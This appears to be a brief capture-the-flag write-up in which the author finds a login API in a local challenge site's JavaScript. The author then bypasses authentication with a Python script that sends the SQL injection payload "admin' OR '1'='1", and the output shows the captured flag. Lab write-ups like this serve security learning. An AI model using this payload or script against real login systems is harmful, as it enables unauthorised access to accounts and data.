Table of contents
Login request identification
Download website:
curl localhost:8000 >> web.txt
found this in it:
<script src="/static/script.js" type="text/javascript"></script>
Download /static/script.js:
curl http://localhost:8000/static/script.js
Found login request:
.ajax('/api/v1/login/', {
method: 'POST',
data: JSON.stringify(dat),
dataType: "json",
contentType: "application/json",
}).done(function(res) {
if (res['status'] == 'success'){
$("#stat").html('<b>Successful Login. Here is your flag: ');
$("#stat").append(res['flag']);
$("#stat").append('</b>');
}
});
SQL injection on /api/v1/login/
Then went for a Python script to try a basic SQL injection:
import requests
import json
# Target URL
url = "http://localhost:8000/api/v1/login/"
# Malicious payload for SQL Injection
payload = {
"username": "admin' OR '1'='1", # Always true condition
"password": "anything" # Irrelevant due to SQLi
}
# Send the request
response = requests.post(url, headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# Check response
if response.status_code == 200:
try:
data = response.json()
if "flag" in data:
print("[+] Flag found: ", data["flag"])
else:
print("[-] Login successful but no flag found.")
except json.JSONDecodeError:
print("[-] Invalid JSON response. Possible error page returned.")
else:
print(f"[-] Server returned status code {response.status_code}. Possible error.")
$ python3 script03.py
[+] Flag found: ECSC{889b71de2017ca8074f49d3f853950e147591b38}